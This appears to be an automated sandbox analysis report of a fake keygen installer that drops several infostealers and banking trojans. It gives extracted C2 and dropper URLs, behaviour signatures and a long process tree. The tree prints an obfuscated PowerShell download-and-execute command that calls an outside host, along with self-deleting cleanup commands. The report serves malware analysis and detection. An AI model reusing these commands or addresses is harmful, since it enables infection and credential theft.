Analysis

  • max time kernel
    600s
  • max time network
    601s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    11-04-2021 06:14

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

icedid

Campaign

1925120085

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 16 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:992
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1084
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:944
        • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
          C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
          2⤵
          • Suspicious use of SetThreadContext
          PID:4360
          • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
            "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
            3⤵
              PID:6228
            • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
              "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
              3⤵
                PID:3552
              • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                3⤵
                  PID:6032
                • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                  "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                  3⤵
                    PID:5028
                • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                  C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                  2⤵
                  • Suspicious use of SetThreadContext
                  PID:5344
                  • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                    "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                    3⤵
                      PID:5824
                  • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                    C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                    2⤵
                    • Suspicious use of SetThreadContext
                    PID:6368
                    • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                      "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                      3⤵
                        PID:2356
                      • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                        "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                        3⤵
                          PID:1016
                      • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                        C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:4340
                        • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                          "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                          3⤵
                            PID:4436
                        • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                          C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:5700
                          • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                            "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                            3⤵
                              PID:3808
                            • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                              "C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"
                              3⤵
                                PID:4940
                            • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                              C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                              2⤵
                                PID:6160
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                              1⤵
                                PID:1912
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                1⤵
                                  PID:2496
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                  1⤵
                                    PID:2444
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2428
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                    1⤵
                                      PID:2248
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                      1⤵
                                        PID:2156
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                        1⤵
                                          PID:1424
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                          1⤵
                                            PID:1296
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                            1⤵
                                              PID:1236
                                            • C:\Users\Admin\AppData\Local\Temp\Radica_Electra_E7_R1_R1_0_keygen.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Radica_Electra_E7_R1_R1_0_keygen.exe"
                                              1⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1032
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1628
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                  keygen-pr.exe -p83fsase3Ge
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1268
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3960
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                      C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:2848
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                  keygen-step-1.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:2712
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                  keygen-step-3.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:804
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:420
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 1.1.1.1 -n 1 -w 3000
                                                      5⤵
                                                      • Runs ping.exe
                                                      PID:4032
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                  keygen-step-4.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2824
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:864
                                                    • C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Maps connected drives based on registry
                                                      • Drops file in Windows directory
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3908
                                                      • C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe" 1 3.1618121687.607293d744048 101
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:2556
                                                        • C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\T4YK4L0QCF\multitimer.exe" 2 3.1618121687.607293d744048
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks for any installed AV software in registry
                                                          PID:4568
                                                          • C:\Users\Admin\AppData\Local\Temp\3ihxow1goo3\jdsin34cwy2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\3ihxow1goo3\jdsin34cwy2.exe" /VERYSILENT
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4032
                                                            • C:\Users\Admin\AppData\Local\Temp\is-GRQ8V.tmp\jdsin34cwy2.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-GRQ8V.tmp\jdsin34cwy2.tmp" /SL5="$6021A,140785,56832,C:\Users\Admin\AppData\Local\Temp\3ihxow1goo3\jdsin34cwy2.exe" /VERYSILENT
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3900
                                                              • C:\Users\Admin\AppData\Local\Temp\is-2PHTH.tmp\apipostback.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-2PHTH.tmp\apipostback.exe" adan adan
                                                                10⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5716
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\oVonTuqvq.dll"
                                                                  11⤵
                                                                    PID:5428
                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                      regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\oVonTuqvq.dll"
                                                                      12⤵
                                                                        PID:4492
                                                                        • C:\Windows\system32\regsvr32.exe
                                                                          /s "C:\Users\Admin\AppData\Local\Temp\oVonTuqvq.dll"
                                                                          13⤵
                                                                          • Loads dropped DLL
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4804
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\oVonTuqvq.dllISiCRFOtc.dll"
                                                                      11⤵
                                                                        PID:6340
                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                          regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\oVonTuqvq.dllISiCRFOtc.dll"
                                                                          12⤵
                                                                            PID:4428
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                          11⤵
                                                                          • Blocklisted process makes network request
                                                                          • Executes dropped EXE
                                                                          PID:1216
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                            12⤵
                                                                            • Blocklisted process makes network request
                                                                            PID:4168
                                                                  • C:\Users\Admin\AppData\Local\Temp\wyubukcjyix\KiffApp1.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\wyubukcjyix\KiffApp1.exe"
                                                                    8⤵
                                                                      PID:1216
                                                                    • C:\Users\Admin\AppData\Local\Temp\wi5sdlq4cek\atpfd5u4dj0.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\wi5sdlq4cek\atpfd5u4dj0.exe" /ustwo INSTALL
                                                                      8⤵
                                                                        PID:1252
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "atpfd5u4dj0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wi5sdlq4cek\atpfd5u4dj0.exe" & exit
                                                                          9⤵
                                                                            PID:6568
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im "atpfd5u4dj0.exe" /f
                                                                              10⤵
                                                                              • Kills process with taskkill
                                                                              PID:7036
                                                                        • C:\Users\Admin\AppData\Local\Temp\g5gxzebviah\Setup3310.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\g5gxzebviah\Setup3310.exe" /Verysilent /subid=577
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:5128
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-LJGAM.tmp\Setup3310.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-LJGAM.tmp\Setup3310.tmp" /SL5="$10338,138429,56832,C:\Users\Admin\AppData\Local\Temp\g5gxzebviah\Setup3310.exe" /Verysilent /subid=577
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:5292
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-DTK15.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-DTK15.tmp\Setup.exe" /Verysilent
                                                                              10⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Program Files directory
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6124
                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5772
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5700
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:7116
                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5628
                                                                                • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5904
                                                                                  • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                                                    13⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4628
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im viqconf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe" & del C:\ProgramData\*.dll & exit
                                                                                      14⤵
                                                                                        PID:4412
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im viqconf.exe /f
                                                                                          15⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:6808
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          15⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:428
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5748
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5364
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                    12⤵
                                                                                      PID:4344
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                        13⤵
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5940
                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                                    11⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5536
                                                                                    • C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                      12⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      PID:6388
                                                                                      • C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe" 1 3.1618121728.607294008acb5 103
                                                                                        13⤵
                                                                                        • Adds Run key to start application
                                                                                        PID:3176
                                                                                        • C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\NUWK54ZR5R\multitimer.exe" 2 3.1618121728.607294008acb5
                                                                                          14⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          PID:7104
                                                                                          • C:\Users\Admin\AppData\Local\Temp\nf3im3yqz5a\vpn.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\nf3im3yqz5a\vpn.exe" /silent /subid=482
                                                                                            15⤵
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4084
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-OO26V.tmp\vpn.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-OO26V.tmp\vpn.tmp" /SL5="$20546,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nf3im3yqz5a\vpn.exe" /silent /subid=482
                                                                                              16⤵
                                                                                                PID:5764
                                                                                            • C:\Users\Admin\AppData\Local\Temp\fccxtqbsfjy\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\fccxtqbsfjy\app.exe" /8-23
                                                                                              15⤵
                                                                                                PID:3208
                                                                                                • C:\Users\Admin\AppData\Local\Temp\fccxtqbsfjy\app.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\fccxtqbsfjy\app.exe" /8-23
                                                                                                  16⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:6456
                                                                                              • C:\Users\Admin\AppData\Local\Temp\mdnlncxpari\lfdpxvrt00i.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\mdnlncxpari\lfdpxvrt00i.exe" /ustwo INSTALL
                                                                                                15⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:6912
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "lfdpxvrt00i.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mdnlncxpari\lfdpxvrt00i.exe" & exit
                                                                                                  16⤵
                                                                                                    PID:3208
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im "lfdpxvrt00i.exe" /f
                                                                                                      17⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:6008
                                                                                                • C:\Users\Admin\AppData\Local\Temp\rxetsyca0nu\Setup3310.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\rxetsyca0nu\Setup3310.exe" /Verysilent /subid=577
                                                                                                  15⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:6716
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-116SM.tmp\Setup3310.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-116SM.tmp\Setup3310.tmp" /SL5="$1054C,138429,56832,C:\Users\Admin\AppData\Local\Temp\rxetsyca0nu\Setup3310.exe" /Verysilent /subid=577
                                                                                                    16⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:7152
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KNE1V.tmp\Setup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-KNE1V.tmp\Setup.exe" /Verysilent
                                                                                                      17⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4824
                                                                                                • C:\Users\Admin\AppData\Local\Temp\tpn0pfpupsc\setup_10.2_us3.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tpn0pfpupsc\setup_10.2_us3.exe" /silent
                                                                                                  15⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:6108
                                                                                          • C:\Users\Admin\AppData\Local\Temp\H24OL7I1TG\setups.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\H24OL7I1TG\setups.exe" ll
                                                                                            12⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6432
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-POH7S.tmp\setups.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-POH7S.tmp\setups.tmp" /SL5="$30290,2051888,270336,C:\Users\Admin\AppData\Local\Temp\H24OL7I1TG\setups.exe" ll
                                                                                              13⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks computer location settings
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:6496
                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                          11⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4580
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MCLTQ.tmp\LabPicV3.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MCLTQ.tmp\LabPicV3.tmp" /SL5="$10458,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                            12⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4160
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-NUIMH.tmp\alpATCHInO.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-NUIMH.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                              13⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5692
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                dw20.exe -x -s 1268
                                                                                                14⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5100
                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                          11⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          • Suspicious use of WriteProcessMemory
